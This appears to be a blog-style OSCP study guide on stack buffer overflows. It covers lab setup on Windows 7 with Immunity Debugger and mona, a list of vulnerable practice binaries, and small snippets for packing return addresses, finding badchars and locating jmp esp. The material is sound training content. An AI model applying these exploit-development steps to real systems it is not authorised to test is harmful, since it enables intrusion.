BoF OSCP Style Study Series
In my studies for OSCP, I found several people who mostly recommend base applications for practicing BoF as being:
- SLmail 5.5;
- Brainpan;
- The TryHackMe Binary with 10 BoF OSCP Style;
- The Binaries of the OSCP laboratory study machine;
- The “storageserver” Binary available in the OSCP laboratory on machine LP07.
The fastest way to start practicing is to set up a local laboratory, basically a Windows 7 machine with vulnerable applications without firewall and antivirus settings and tools to analyze at runtime, so you can avoid the headaches using VPNs or slow VMs from online laboratory services, as most of the apps I named earlier are easy to find and install anywhere.
Setting up the environment
To mount the machine, Microsoft allows you to download a ready-made VM from the link, you just need to do the following:
- Disable Windows updates and Firewall;
- Add fixed IP (Optional).
To install the analysis tools, that is, install Immunity Debugger and mona, we can download Immunity here and mona from GitHub here. The Immunity Debugger will install python2.7 at the end of the installation, so you don’t need to download anything else. The mona is needed to put in the “Pycommands” folder found in the Immunity Debugger installation location. With this we have already created a very functional laboratory environment in a local way.
Getting vulnerable applications
Some applications are easy to get directly from the manufacturer’s website or exploit-db, but others are not. To obtain the “storageserver” it is necessary to have access to the OSCP laboratory’s VPN or ask a colleague who has access to download and share, the same goes for the binaries of the OSCP laboratory’s study machine, so it is highly recommended to take advantage of it the time of the OSCP laboratory VPN and downloading all these applications, which are just there to be downloaded by students; For the TryHackMe binary, I recommend creating the SLmail 5.5 exploit locally, then accessing the TryHackMe VPN, connecting the VM from the BoF series at this link, installing the SLmail that is in the VM, exploiting the service and exfiltrating the OSCP.exe binary and your DLL.
BoF information and technical guides
I really like S4vitar’s tips, he’s a Spanish hacker, I think it’s not too difficult to understand his explanation of BoF, besides being documented in this link (along with all his general OSCP tips), you can also watch the step-by-step video from setting up the environment to obtaining a system with the exploit created for BoF.
The BoF TryHackMe Series itself is at this link, it also has the BoF explanation step by step, it seems to me very well explained the whole procedure in “task 2”, where it details the operation of the binary I mentioned before and explores it without detailing information and Buffer values or return addresses, which are the questions of the activity and the student must find.
The Penetration Tester M0chan has a well explained and technically detailed guide here, as well as some examples of vulnerable applications.
Finally, the OSCP material itself is quite complete in address the subject of BoF and details the exploration step by step.
Extras
As an extra, it’s good to mention some important commands to use when creating the BoF exploit.
To convert the return address and be able to add it directly to our buffer, it’s a good idea to use the following lines in python:
from struct import *
#add in import sectionaddr_return = pack('<L',0x000000)
# exchange the 000000 for the return address found
With the previous two lines, it is no longer necessary to write the address backwards and add “\x” to each value.
When looking for badchars, many prefer to do the manual process and nothing against it, but I recommend doing a check using mona in the end, for that, we use the following commands:
!mona config -set workingfolder C:\Users\meuUser\Desktop\%p
#create mona working directory!mona bytearray -b "\x00"
#create the badchars array already removing the found badchars!mona compare -f C:\Users\meuUser\Desktop\appName\bytearray.bin -a ADDR
#compare the results and check that there are no more badchars
First we create mona’s working directory, in which the badchar array is generated by mona and with which it makes comparisons, it is important to note that in the third command the value ADDR is the address value of the first character of the array of badchars . For more details, this link has a more complete explanation and the TryHackMe series also covers this subject.
Finally, when looking for the return address, mona can again give you a little help with the following command:
!mona jmp -r esp -cpb "\x00\x07"
With the previous command, mona already looks for a jmp esp call that doesn’t have the badchars informed in the return address.
Finally, I know that it depends on the applications to be studied, some extra settings must be done, but as the goal was to create a basic, fast and useful environment to focus on studies for the OSCP exam, I didn’t feel the need for more advanced settings , because the configurations here fulfill satisfactorily with this objective.
I would like to thank Microsoft for making the VMs available for free, the folks at TryHackMe for creating the BoF Series, and S4avitar for sharing their experiences with the OSCP exam.